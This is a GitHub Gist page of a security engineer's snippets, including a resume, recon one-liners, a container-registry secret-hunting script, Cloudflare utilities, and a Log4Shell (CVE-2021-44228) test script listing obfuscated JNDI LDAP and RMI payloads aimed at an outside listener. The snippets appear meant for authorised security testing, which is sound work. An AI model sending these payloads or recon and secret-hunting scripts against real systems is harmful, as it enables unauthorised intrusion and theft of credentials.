Skip to content

Instantly share code, notes, and snippets.

View dustinbutterworth's full-sized avatar
:octocat:

Dustin Butterworth dustinbutterworth

:octocat:
8 followers · 11 following
View GitHub Profile
@dustinbutterworth
dustinbutterworth / resume.json
Last active April 20, 2023 12:47
{
"meta": {
"theme": "elegant"
},
"basics": {
"name": "Dustin Butterworth",
"label": "Senior Security Engineer",
"image": "https://media.licdn.com/dms/image/C4E03AQEUtr1vmtPtng/profile-displayphoto-shrink_400_400/0/1565967104726?e=1687392000&v=beta&t=FuY6u_9nUMOjYE9ySZKrPP8Y85LOai0ETO4U8crh5z8",
"url": "https://www.dustinbutterworth.com/",
"summary": "I am a Senior Security Engineer with a focus on DevOps concepts. I have experience in automation, vulnerability management, application security, cloud security, container security, and incident response. I have experience with both Azure and AWS cloud environments. My preferred programming languages are Python, Bash, and Powershell. I thrive in an environment where I can build policies, processes, procedures, tools, and automation with minimal supervision.",
@dustinbutterworth
dustinbutterworth / untar_gunzip_sep_dir.py
Created August 22, 2022 17:03
Untar, Gunzip all files in a directory into their own directory
import os
import tarfile
base_dir = '/path/to/tarfiles'
import os
for path, directories, files in os.walk(base_dir):
for f in files:
if f.endswith(".tar.gz"):
filepath = f.replace(".tar.gz", "")
tar = tarfile.open(os.path.join(path,f), 'r:gz')
tar.extractall(path=filepath)
@dustinbutterworth
dustinbutterworth / acr-secret-recon.sh
Created August 18, 2022 17:48
az acr repository secrets hunting
#!/usr/bin/env bash
# ./acr-secret-recon.sh nginx myrepo.repo.com myrepo
image=${1}
docker_repo=${2}
acr_repo_name=${3}
mkdir ${image}
cd ${image}
tag=$(az acr repository show-tags -n ${acr_repo_name} --repository ${image} | jq '.[-1]' -r)
docker pull ${docker_repo}/${image}:${tag}
image_id=$(docker images | grep ${image} | awk '{print $3}')
@dustinbutterworth
dustinbutterworth / comm.sh
Created June 2, 2022 18:24
File Comparison
# Combined some answers for this method I like best https://unix.stackexchange.com/a/28185
comm -3 <(sort file1.csv) <(sort file2.csv)
@dustinbutterworth
dustinbutterworth / reconscriptlets.sh
Created May 31, 2022 13:01
Handy Recon Scriptlets
# This will contain more as time passes, but put these all together from https://twitter.com/pry0cc/status/1504148938085052423
subfinder -d target | httpx -ports 80,443,8080,8443 | anew urls.txt # can also use naabu
subfinder -d target | dnsx -resp | awk ‘{ print $2 }’ | anew IPs.txt
tew -x nmap.xml | httpx
subfinder -d target | dnsx -json -o dns.json # This will generate a JSON output of the DNS resolutions for our targets. Then:
tew -x nmap.xml -dnsx dns.json —vhosts | httpx
@dustinbutterworth
dustinbutterworth / cfZtDnsQuery.sh
Created March 28, 2022 19:49
Query Cloudflare Subcategory IDs to see what an ID number correlates to
#!/usr/bin/env bash
# Provide the Subcategory ID number you want to check as an argument to the script.
# It will show you detailsa bout that Subcategory ID pulled from cloudflare docs github page.
# Trying to pull dierctly from the developer documentation pages, curl is blocked. This bypasses that.
category_number=$1
url="https://raw.githubusercontent.com/cloudflare/cloudflare-docs/production/content/cloudflare-one/policies/filtering/dns-policies-builder/dns-categories.md"
echo "| Category ID | Category Name | Subcategory ID | Subcategory Name |"
curl -s "$url" | sed -n -e '/DNS Category and Subcategory IDs/,$p' | grep '^|' | awk -F '|' '$4 ~ "'${category_number}'" {print $0}'
@dustinbutterworth
dustinbutterworth / parseHtml.sh
Created March 28, 2022 18:44
Parse html
#!/usr/bin/env bash
xmlgetnext () {
local IFS='>'
read -d '<' TAG VALUE
}
cat $1 | while xmlgetnext ; do echo $TAG ; done
@dustinbutterworth
dustinbutterworth / cloudflareAccessReport.ps1
Last active March 25, 2022 18:47
Cloudflare Access Report - All Zones, All Applications
#!/usr/bin/env pwsh
# WIP - not finished
# TODO: error catching and whatnot
$cloudflareUrl = "https://api.cloudflare.com/client/v4"
# Retrieve Zones
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Content-Type", "application/json")
$headers.Add("Authorization", "Bearer changeme")
$zoneRetrievePage = 1
@dustinbutterworth
dustinbutterworth / CVE-2021-44228.sh
Last active December 17, 2021 19:38
CVE-2021-44228 Simple Curl Test
#!/usr/bin/env bash
# Run with arguments like: ./CVE-2021-44228.sh aabbccddeeffgg.interact.sh https://test.com/test
LISTENER=$1
URL=$2
PAYLOAD='${jndi:ldap://'${LISTENER}'}'
# PAYLOAD='${jndi:${lower:l}${lower:d}a${lower:p}://'${LISTENER}''
# PAYLOAD='${j${k8s:k5:-ND}i${sd:k5:-:}ldap://'${LISTENER}'}'
# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://'${LISTENER}'} '
# PAYLOAD='${${::-j}ndi:rmi://'${LISTENER}'} '
@dustinbutterworth
dustinbutterworth / radar.sh
Created December 8, 2021 14:02
Cloudflare Radar Query Function
# Throw this in your .bashrc/.zshrc/etc... and run
# radar domain.com
radar () {
curl -k -s https://radar.cloudflare.com/api/domains/categories\?domain\=$1 | jq .
}